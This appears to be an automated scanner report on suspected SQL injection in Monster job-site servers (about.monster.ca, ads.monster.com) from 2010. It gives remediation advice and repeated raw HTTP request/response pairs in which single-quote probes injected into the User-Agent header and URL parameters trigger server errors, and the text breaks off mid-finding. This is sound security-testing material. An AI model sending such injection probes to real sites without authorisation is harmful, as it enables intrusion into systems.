SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the application's code base.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1
Host: about.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Fri, 26 Nov 2010 19:31:43 GMT
Content-Length: 1208
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
Request 2
GET / HTTP/1.1
Host: about.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Response 2
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12741
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQTDTBST=EPHKPKPDCIJBEIJODACPONPE; path=/
Date: Fri, 26 Nov 2010 19:31:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-ca" xml:lang="en-ca">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=341042&AdID=417423&TargetID=119775&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18062,33349,38779,39959,39962,42970,49534,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,119775,68086,106821&Values=77,85,94,211,412,1053,1435,3549,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.randstad.ca/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=341042&AdID=417423&TargetID=119775&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18062,33349,38779,39959,39962,42970,49534,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,119775,68086,106821&Values=77,85,94,211,412,1053,1435,3549,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.randstad.ca/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://www.randstad.ca/
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=345735&AdID=423596&TargetID=88583&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49426,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,88583,106821&Values=77,85,94,211,412,667,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32197,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/homedepot/2008Q1En/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=345735&AdID=423596&TargetID=88583&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49426,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,88583,106821&Values=77,85,94,211,412,667,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32197,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/homedepot/2008Q1En/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://media.monster.ca/homedepot/2008Q1En/
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=353792&AdID=432998&TargetID=129624&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49715,53574,55561,55882,60647,60648,60649,61243,61588,61839,62430,62432,66646,66729,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,72993,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129624&Values=77,85,94,139,197,370,412,668,1053,1435,4596,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32073,32196,32224,33248,41343,42640,46083,61236&RawValues=&Redirect=http:/clk.redcated/MON/go/265829206/direct/01/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=353792&AdID=432998&TargetID=129624&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49715,53574,55561,55882,60647,60648,60649,61243,61588,61839,62430,62432,66646,66729,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,72993,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129624&Values=77,85,94,139,197,370,412,668,1053,1435,4596,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32073,32196,32224,33248,41343,42640,46083,61236&RawValues=&Redirect=http:/clk.redcated/MON/go/265829206/direct/01/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://clk.redcated/MON/go/265829206/direct/01/
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect= HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect= HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://ads.monster.com:80/
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:26:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354943&AdID=434161&TargetID=120354&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:26:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://jdn.monster.com/render/adimagelog.aspx
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect= HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect= HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://ads.monster.com:80/
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:26:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=354944&AdID=434162&TargetID=120353&Redirect=http:/jdn.monster.com/render/adimagelog.aspx HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:26:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://jdn.monster.com/render/adimagelog.aspx
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=366310&AdID=446802&TargetID=68087&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49535,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,68087,106821&Values=77,85,94,211,412,1053,1435,4718,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/indigo/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=366310&AdID=446802&TargetID=68087&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49535,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,68087,106821&Values=77,85,94,211,412,1053,1435,4718,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/media.monster.ca/indigo/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://media.monster.ca/indigo/
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=371110&AdID=452586&TargetID=67962&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,18059,33349,38779,39959,39962,42970,49430,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,67962,106821&Values=77,85,94,211,412,850,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.lowes.ca/careers/why_work_at_lowes.aspx HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=371110&AdID=452586&TargetID=67962&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,18059,33349,38779,39959,39962,42970,49430,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,67962,106821&Values=77,85,94,211,412,850,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.lowes.ca/careers/why_work_at_lowes.aspx HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://www.lowes.ca/careers/why_work_at_lowes.aspx
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=373962&AdID=456009&TargetID=125487&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49428,49715,53574,55561,55882,61588,62430,62432,66337,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,125487,127382,67963,92584,106821&Values=77,85,94,211,412,669,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.idealpersonnel.com/jobs/index.htm HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=373962&AdID=456009&TargetID=125487&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49428,49715,53574,55561,55882,61588,62430,62432,66337,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,125487,127382,67963,92584,106821&Values=77,85,94,211,412,669,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.idealpersonnel.com/jobs/index.htm HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Nov 2010 19:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
Pragma: max-age=0
Location: http://www.idealpersonnel.com/jobs/index.htm
Content-type: text/html
Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=374308&AdID=456354&TargetID=73789&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49715,53574,54687,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,73789,106821&Values=77,85,94,211,412,1053,1435,6027,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.goodlifefitness.monstermediaworks.ca/ HTTP/1.1
Host: ads.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error
Connection: close
Date: Fri, 26 Nov 2010 19:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Unable to process Ad request
Request 2
